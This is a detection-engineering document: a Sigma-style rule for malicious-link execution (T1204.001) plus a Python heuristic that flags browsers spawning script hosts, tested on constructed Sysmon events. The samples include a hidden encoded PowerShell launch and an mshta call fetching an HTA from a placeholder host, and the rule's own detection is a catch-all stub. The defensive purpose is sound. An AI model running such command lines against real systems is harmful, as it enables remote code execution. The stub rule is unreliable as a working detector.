title: Malicious Link (T1204.001)
id: df00tech-t1204-001
status: experimental
description: "Adversaries may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from spearphishing links delivered via email, messaging platforms, or social media. Clicking on a link may lead to exploitation of a browser or application vulnerability, or direct download of a file requiring execution. Threat actors and malware families including FIN7, Kimsuky, QakBot, Bazar, and Mustang Panda have all leveraged malicious links as initial access vectors, often hosting payloads on legitimate cloud services such as Google Docs, OneDrive, or Dropbox to evade reputation-based filtering."
references:
  - https://attack.mitre.org/techniques/T1204/001/
  - https://df00tech.com/detections/T1204.001
author: df00tech
date: 2026/04/19
tags:
  - attack.t1204.001
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "Enterprise software deployment portals that use browser-initiated installers (ClickOnce, MSIX) may trigger msiexec.exe as a browser child process"
  - "Legitimate browser extensions or helper applications (e.g., meeting clients, VPN agents) that launch via protocol handlers (e.g., zoom://, msteams://)"
  - "Developer workstations where browser-based IDEs or tools legitimately spawn Node.js, Python, or PowerShell processes"
  - "IT-managed browser kiosks running automation scripts that interact with browsers and spawn controlled child processes"
  - "PDF viewers or office document handlers launched from browser downloads that briefly show the browser as the parent process"
level: high

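The rule above ships without translated detection logic, but its false-positive notes describe the pattern it is built around: a browser process spawning an installer or script host. The following is an added example, not df00tech's rule or KQL/SPL query, that applies that pattern to constructed Sysmon Event ID 1 style records and carves out the documented benign cases. The browser and child-process lists, the managed deployment share path, the protocol-handler prefixes and all sample events are assumptions for illustration; tune them to your environment.

```python
"""Browser-child process heuristic for T1204.001 (added example, not the
df00tech rule). Flags a browser parent launching an installer or script host,
while allowing the benign cases the rule lists as false positives."""
import ntpath
from typing import Optional

# Assumed process name lists (illustrative; extend for your fleet).
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "brave.exe"}
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "node.exe", "python.exe",
}
INSTALLERS = {"msiexec.exe"}

# Hypothetical tuning values for the documented false positives:
# - ClickOnce/MSIX portals drop packages on a managed share (path is made up).
# - Meeting/VPN helpers are launched through registered protocol handlers.
MANAGED_DEPLOY_SHARE = r"\\corp-deploy\packages"
PROTOCOL_HANDLER_PREFIXES = ("zoom://", "msteams://")


def _basename(path: str) -> str:
    """Windows image paths are compared by lowercase file name only."""
    return ntpath.basename(path).lower()


def classify(event: dict) -> Optional[str]:
    """Return an alert reason for a process_creation event, or None if benign."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "").lower()

    if parent not in BROWSERS:
        return None  # only browser-spawned children are in scope
    if any(prefix in cmd for prefix in PROTOCOL_HANDLER_PREFIXES):
        return None  # helper app launched via protocol handler (documented FP)
    if child in INSTALLERS:
        if MANAGED_DEPLOY_SHARE.lower() in cmd:
            return None  # browser-initiated installer from the managed portal
        return f"browser {parent} launched installer {child}"
    if child in SCRIPT_HOSTS:
        return f"browser {parent} launched script host {child}"
    return None  # e.g. PDF viewer opened from a download (documented FP)


def scan(events: list) -> list:
    """Run classify() over a batch and return (UtcTime, reason) pairs."""
    return [(e["UtcTime"], r) for e in events if (r := classify(e))]


# Constructed sample events in Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {   # browser -> PowerShell with hidden window: alert
        "UtcTime": "2026-04-19 10:01:00",
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc <BASE64_PLACEHOLDER>",
    },
    {   # browser -> msiexec from the managed deployment share: documented FP
        "UtcTime": "2026-04-19 10:02:00",
        "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r'msiexec.exe /i "\\corp-deploy\packages\Client.msi" /qn',
    },
    {   # browser -> meeting client via protocol handler: documented FP
        "UtcTime": "2026-04-19 10:03:00",
        "ParentImage": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "Image": r"C:\Users\alice\AppData\Roaming\Zoom\bin\Zoom.exe",
        "CommandLine": "Zoom.exe --url=zoom://join?confno=<PLACEHOLDER>",
    },
    {   # browser -> PDF viewer from a download: not a script host, no alert
        "UtcTime": "2026-04-19 10:04:00",
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "Image": r"C:\Program Files\Adobe\Acrobat Reader\AcroRd32.exe",
        "CommandLine": r'AcroRd32.exe "C:\Users\alice\Downloads\invoice.pdf"',
    },
    {   # browser -> mshta with a remote URL: alert
        "UtcTime": "2026-04-19 10:05:00",
        "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta.exe http://<PLACEHOLDER_HOST>/update.hta",
    },
]

if __name__ == "__main__":
    for when, reason in scan(SAMPLE_EVENTS):
        print(when, reason)
```

Anchoring on parent image rather than on the child alone is what keeps the rule at `level: high` without drowning in noise: the same PowerShell launch under `explorer.exe` is left to other rules, and the two allow-list checks map one-to-one onto the false positives listed above.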